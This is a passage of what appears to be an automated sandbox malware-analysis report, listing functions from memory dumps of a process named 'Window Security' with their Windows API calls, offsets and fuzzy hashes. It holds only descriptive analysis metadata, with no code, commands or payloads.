                                                    APIs
                                                    • CreateActCtxA.KERNEL32(?), ref: 02583401
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Create
                                                    • String ID:
                                                    • API String ID: 2289755597-0
                                                    • Opcode ID: 306b5546db7de96a3a5f0838739447962be33ed6c4089178b09547fba0f04f4f
                                                    • Instruction ID: abcfcb8f255e8575742c3e5cce3d5cefd84fef1ca0a931b0e79fa413e2ca85fc
                                                    • Opcode Fuzzy Hash: 306b5546db7de96a3a5f0838739447962be33ed6c4089178b09547fba0f04f4f
                                                    • Instruction Fuzzy Hash: 1A4104B0C00719CBDB24DFA9C84878DBBB5BF44704F20806AD409BB251DBB56946CF94
                                                    Function 0258DC39 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0258DCC7
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 80f1237a322b16746797560123314c50962a7700970d49bc7eccafb30dfaa684
                                                    • Instruction ID: c171a6fdb077961eed83bae6284a6e46ee9a59f2caf6ebe8247b37164853e53a
                                                    • Opcode Fuzzy Hash: 80f1237a322b16746797560123314c50962a7700970d49bc7eccafb30dfaa684
                                                    • Instruction Fuzzy Hash: 5821E7B59002089FDB10CF9AD984ADEFFF5FB48314F14841AE914A3350D378A944CFA4
                                                    Function 0258DC40 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0258DCC7
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 432dea6f0827715631efa8ef7eea86101e165fb81c03636d46dcb08c84e50eb5
                                                    • Instruction ID: 70fe4c013e3d3b043ffceb4ee7575cf9e602468e05d3daab076274d5a8014141
                                                    • Opcode Fuzzy Hash: 432dea6f0827715631efa8ef7eea86101e165fb81c03636d46dcb08c84e50eb5
                                                    • Instruction Fuzzy Hash: 6E21E4B59002089FDB10CFAAD984ADEBFF9FB48310F14841AE918A3350C378A944CFA4
                                                    Function 0258DB18 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0258E6BD
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: 24501835718e7053bb27fb846ef273b368bc980826a2ce60c2e7885fdb205d53
                                                    • Instruction ID: 6169851c818a48265dfb321d2deb3b1ba39016cf7196b51ab2df381e91c5b4b5
                                                    • Opcode Fuzzy Hash: 24501835718e7053bb27fb846ef273b368bc980826a2ce60c2e7885fdb205d53
                                                    • Instruction Fuzzy Hash: 3D1103B19003488FDB20EF9AD545B9EBBF8EB49310F108459E519A7310D379A944CFA5
                                                    Function 0258E660 Relevance: 1.5, APIs: 1, Instructions: 44comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • OleInitialize.OLE32(00000000), ref: 0258E6BD
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2727045444.0000000002580000.00000040.00000800.00020000.00000000.sdmp, Offset: 02580000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_2580000_Window Security.jbxd
                                                    Similarity
                                                    • API ID: Initialize
                                                    • String ID:
                                                    • API String ID: 2538663250-0
                                                    • Opcode ID: bf145a22c92bcfcb56633203e16610c5731f8971d791a7bb5156636fbe3a9479
                                                    • Instruction ID: d9fb94866c6746b16c8c2c55ddd8f8ad13948625147e5031667257e562759608
                                                    • Opcode Fuzzy Hash: bf145a22c92bcfcb56633203e16610c5731f8971d791a7bb5156636fbe3a9479
                                                    • Instruction Fuzzy Hash: 511100B59003098FDB20DF9AD5497DEBBF4AB48320F20845AD558B3710D379A544CFA4
                                                    Function 00A0D3EC Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1d93b949416551d3152677e38c793a9463cd84863cf0ec8a9e6bcb71079c2ddc
                                                    • Instruction ID: 5e04efd74aec501ae17200ffd2e52d1e20428f4a3ac0c52aa81da9ac62003d23
                                                    • Opcode Fuzzy Hash: 1d93b949416551d3152677e38c793a9463cd84863cf0ec8a9e6bcb71079c2ddc
                                                    • Instruction Fuzzy Hash: 26212572500208EFCB05DF94E9C0F26BF65FB98320F20C569E9090B296C33BE856D7A1
                                                    Function 00A0D4D8 Relevance: .1, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b402bebadddd6491a5480819840716a8165d4151ddd7643b39f8cf89d98c74c8
                                                    • Instruction ID: 377a681b20599edfb834c033a3e03a8708e5f952e1cf889a791c5ac3f1655fba
                                                    • Opcode Fuzzy Hash: b402bebadddd6491a5480819840716a8165d4151ddd7643b39f8cf89d98c74c8
                                                    • Instruction Fuzzy Hash: 6A210A72504208DFDB05DF94EDC0F26BF65FB98318F248569ED090B296C33AE856D7A2
                                                    Function 00A0D3E7 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 5950507e447e0919292c146230c7fef17e978221a0813061a780b420601d04b5
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 64110372404244DFCB02CF40D9C4B16BF72FB94320F24C5A9D9090B656C33AE85ACBA2
                                                    Function 00A0D4D3 Relevance: .1, Instructions: 56COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 0000005D.00000002.2724939966.0000000000A0D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A0D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_93_2_a0d000_Window Security.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction ID: 61e5df305d027ec7e99851c9aadda3f83a86dbb249ff4916e0d424f8c05f15ae
                                                    • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                                    • Instruction Fuzzy Hash: 6111E676504244CFCB16CF54E9C4B16BF71FB98324F24C6A9DD090B256C33AE85ACBA2